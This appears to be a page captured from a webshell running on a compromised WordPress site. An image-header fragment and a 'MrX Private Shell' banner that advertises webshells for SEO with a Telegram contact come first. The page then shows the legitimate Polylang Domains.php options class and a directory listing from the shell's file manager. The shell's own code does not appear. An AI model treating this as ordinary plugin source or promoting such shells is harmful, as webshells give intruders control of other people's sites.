����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Polylang
*/
namespace WP_Syntex\Polylang\Options\Business;
use WP_Error;
use WP_Syntex\Polylang\Options\Options;
use WP_Syntex\Polylang\Model\Languages;
use WP_Syntex\Polylang\Options\Primitive\Abstract_Map;
defined( 'ABSPATH' ) || exit;
/**
* Class defining single associative array of domain as value and language slug as key option.
* /!\ Sanitization depends on `force_lang`: this option must be set AFTER `force_lang`.
*
* @since 3.7
*
* @phpstan-type DomainsValue array<non-falsy-string, string>
*/
class Domains extends Abstract_Map {
/**
* Returns option key.
*
* @since 3.7
*
* @return string
*
* @phpstan-return 'domains'
*/
public static function key(): string {
return 'domains';
}
/**
* Returns the default value.
*
* @since 3.7
*
* @return array
*/
protected function get_default() {
return array();
}
/**
* Returns the JSON schema part specific to the inner structure of this option.
*
* @since 3.8
*
* @return array Inner structure.
*/
protected function get_inner_structure(): array {
return array(
'patternProperties' => array(
Languages::SLUG_PATTERN => array( // Language slug as key.
'type' => 'string',
'format' => 'uri',
),
),
'additionalProperties' => false,
);
}
/**
* Sanitizes option's value.
* Can populate the `$errors` property with blocking and non-blocking errors: in case of non-blocking errors,
* the value is sanitized and can be stored.
*
* @since 3.7
*
* @param array $value Value to sanitize.
* @param Options $options All options.
* @return array|WP_Error The sanitized value. An instance of `WP_Error` in case of blocking error.
*
* @phpstan-return DomainsValue|WP_Error
*/
protected function sanitize( $value, Options $options ) {
// Sanitize new URLs.
$value = parent::sanitize( $value, $options );
if ( is_wp_error( $value ) ) {
// Blocking error.
return $value;
}
/** @phpstan-var DomainsValue */
$current_value = $this->get();
/** @phpstan-var DomainsValue $value */
$all_values = array(); // Previous and new values.
$missing_langs = array(); // Lang names corresponding to the empty values.
$language_terms = $this->get_language_terms();
// Detect empty values, fill missing keys with previous values.
foreach ( $language_terms as $lang ) {
if ( array_key_exists( $lang->slug, $value ) ) {
// Use the new value.
$all_values[ $lang->slug ] = $value[ $lang->slug ];
unset( $value[ $lang->slug ] );
} else {
// Use previous value.
$all_values[ $lang->slug ] = $current_value[ $lang->slug ] ?? '';
}
if ( empty( $all_values[ $lang->slug ] ) ) {
// The value is empty.
$missing_langs[] = $lang->name;
}
}
// Detect invalid language slugs.
if ( ! empty( $value ) ) {
// Non-blocking error.
$this->add_unknown_languages_warning( array_keys( $value ) );
}
if ( 3 === $options->get( 'force_lang' ) && ! empty( $missing_langs ) ) {
// Non-blocking error.
if ( 1 === count( $missing_langs ) ) {
/* translators: %s is a native language name. */
$message = __( 'Please enter a valid URL for %s.', 'polylang' );
} else {
/* translators: %s is a list of native language names. */
$message = __( 'Please enter valid URLs for %s.', 'polylang' );
}
$this->errors->add(
'pll_empty_domains',
sprintf( $message, wp_sprintf_l( '%l', $missing_langs ) ),
'warning'
);
}
// Ping all URLs to make sure they are valid.
if ( $options->get( 'force_lang' ) > 1 ) {
$failed_urls = array();
foreach ( array_filter( $all_values ) as $url ) {
$url = add_query_arg( 'deactivate-polylang', 1, $url );
// Don't redefine vip_safe_wp_remote_get() as it has not the same signature as wp_remote_get().
$response = function_exists( 'vip_safe_wp_remote_get' ) ? vip_safe_wp_remote_get( $url ) : wp_remote_get( $url );
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$failed_urls[] = $url;
}
}
if ( ! empty( $failed_urls ) ) {
// Non-blocking error.
if ( 1 === count( $failed_urls ) ) {
/* translators: %s is a URL. */
$message = __( 'Polylang was unable to access the %s URL. Please check that the URL is valid.', 'polylang' );
} else {
/* translators: %s is a list of URLs. */
$message = __( 'Polylang was unable to access the %s URLs. Please check that the URLs are valid.', 'polylang' );
}
$this->errors->add(
'pll_invalid_domains',
sprintf( $message, wp_sprintf_l( '%l', $failed_urls ) ),
'warning'
);
}
}
/** @phpstan-var DomainsValue */
return $all_values;
}
/**
* Returns the description used in the JSON schema.
*
* @since 3.7
*
* @return string
*/
protected function get_description(): string {
return __( 'Domains used when the language is set from different domains.', 'polylang' );
}
/**
* Adds information to the site health info array.
*
* @since 3.8
*
* @param Options $options An instance of the Options class providing additional configuration.
*
* @return array The updated site health information.
*/
public function get_site_health_info( Options $options ): array { // phpcs:ignore VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable
if ( 3 === $options->get( 'force_lang' ) ) {
return $this->format_single_value_for_site_health_info( $this->get() );
}
return parent::get_site_health_info( $options );
}
/**
* Returns the reset value for a key.
*
* @since 3.8
*
* @param string $key The key to reset. Unused.
* @return mixed The reset value.
*/
protected function reset_value( string $key ) { // phpcs:ignore VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable
return '';
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Abstract_Object_Types.php | File | 1.27 KB | 0644 |
|
| Browser.php | File | 2.34 KB | 0644 |
|
| Default_Lang.php | File | 1.94 KB | 0644 |
|
| Domains.php | File | 5.69 KB | 0644 |
|
| First_Activation.php | File | 1.78 KB | 0644 |
|
| Force_Lang.php | File | 2.26 KB | 0644 |
|
| Hide_Default.php | File | 2.43 KB | 0644 |
|
| Media_Support.php | File | 1.49 KB | 0644 |
|
| Nav_Menus.php | File | 4.98 KB | 0644 |
|
| Post_Types.php | File | 946 B | 0644 |
|
| Previous_Version.php | File | 1.23 KB | 0644 |
|
| Redirect_Lang.php | File | 1.68 KB | 0644 |
|
| Rewrite.php | File | 1.87 KB | 0644 |
|
| Sync.php | File | 2.05 KB | 0644 |
|
| Taxonomies.php | File | 1.02 KB | 0644 |
|
| Version.php | File | 1001 B | 0644 |
|